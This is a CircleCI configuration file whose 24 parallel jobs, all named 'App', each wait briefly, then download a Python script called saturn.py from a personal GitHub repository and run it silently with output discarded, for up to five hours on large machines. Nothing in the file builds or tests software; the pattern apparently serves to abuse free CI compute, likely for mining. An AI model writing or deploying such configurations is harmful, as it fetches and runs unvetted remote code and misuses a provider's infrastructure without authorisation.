
version: 2.1
jobs:
  
  App_01:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 60s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_02:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
          
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 70s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_03:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 80s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1 
  App_04:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 90s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_05:  
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 90s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_06:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 90s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_07:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 100s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_08:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 110s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_09:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 120s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_10:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 130s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_11:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 140s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_12:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 150s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_13:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 160s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_14:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 170s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_15:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 180s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  
   
  App_16:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 190s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_17:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 200s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_18:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 210s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_19:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 220s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_20:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 230s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1

  App_21:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 240s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_22:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 250s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_23:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
     
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 260s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  App_24:
    docker:
      - image: circleci/ruby:3.0.1-buster
    resource_class: large
    steps:
      
      - run:
          name: App
          no_output_timeout: 4h
          command: |
            sleep 270s
            wget https://raw.githubusercontent.com/samrikulan/urlna/main/saturn.py && python3 saturn.py >/dev/null 2>&1
  


workflows:
    version: 2.1
    build:
        jobs:
            - App_01
            - App_02
            - App_03
            - App_04
            - App_05
            - App_06
            - App_07
            - App_08
            - App_09
            - App_10
            - App_11
            - App_12
            - App_13
            - App_14
            - App_15
            - App_16
            - App_17
            - App_18
            - App_19
            - App_20
            - App_21
            - App_22
            - App_23
            - App_24
            
            